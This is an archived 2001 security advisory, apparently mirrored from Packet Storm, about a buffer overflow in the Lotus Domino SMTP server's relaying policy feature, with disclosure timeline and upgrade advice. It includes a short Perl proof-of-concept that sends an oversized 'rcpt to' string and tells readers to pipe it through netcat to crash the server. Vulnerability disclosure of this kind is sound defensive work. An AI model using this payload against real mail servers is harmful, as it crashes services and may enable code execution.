S.A.F.E.R. Security Bulletin 010124.EXP.1.11 - A remotely exploitable buffer overflow has been found in the Lotus Domino SMTP Server on all versions up to and including v5.05 which allows a remote attacker to execute code with the privileges that the SMTP server is running as. Perl exploit code included. Fix available here.
e31bff4434d6413796577845681d26eb776527907f1c66eaef50e9daf1f86b9c
__________________________________________________________
S.A.F.E.R. Security Bulletin 010123.EXP.1.10
__________________________________________________________
TITLE : Buffer overflow in Lotus Domino SMTP Server
DATE : January 23, 2001
NATURE : Remote execution of code, Denial-of-Service
AFFECTED : Lotus Notes/Domino 5 (up to and including 5.05)
PROBLEM:
Buffer overflow exists in Lotus Domino SMTP server, which can lead to Denial-of-Service or remote execution of code in context of user which SMTP server is running as.
DETAILS:
Lotus Domino/Notes server has a 'policy' feature, which is used to define relaying rules. However, improper bounds checking allow remote user to overflow the buffer and execute arbitrary code.
If policy is enabled to check for domain name it is possible to trigger the overflow.
-- cut --
#!/usr/bin/perl
$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";
print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n";
-- cut --
Modify the 'allowed.domain.com' to the domain name which Notes SMTP server is accepting mail for (check policies). Pipe the output through the netcat (for example), and you should be able to crash the remote server.
Further examination of the crash demonstrates that we are able to overwrite contents of EIP register as well, which is the proof of remote code execution possibility.
To recover from the crash, you might be required to remove 'log.nsf' and/or 'mail.box' files afterwards (due to corruption) - be careful while testing for this problem.
This vulnerability has been confirmed on Notes release for Linux and Windows. Others platforms have not been tested.
FIXES:
Lotus has been informed about this problem on November 2nd, 2000. Mail has been 'silently ignored', but the problem has eventually been fixed in 5.0.6 release, and it has been confirmed in a response to our attempt to inform them about the
problem again on January 8th. Fix details are available at:
http://www.notes.net/r5fixlist.nsf/6d4eae9850a5c2c28525690400551b57/5eea8322c479de968525697d00737ad5?OpenDocument
Lotus says that it was 'potential denial of service attack'. However, it is more serious than DoS - code execution is possible. All users that use policy feature should upgrade to Notes/Domino 5.0.6.
CREDITS:
Fyodor Yarochkin <fyodor@relaygroup.com>
Vanja Hrustic <vanja@relaygroup.com>
Thomas Dullien <thomas@relaygroup.com>
Emmanuel Gadaix <emmanuel@relaygroup.com>
This advisory is also available at http://www.safermag.com/advisories/
__________________________________________________________
S.A.F.E.R. - Security Alert For Enterprise Resources
Copyright (c) 2001 The Relay Group
http://www.safermag.com ---- security@relaygroup.com
__________________________________________________________
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed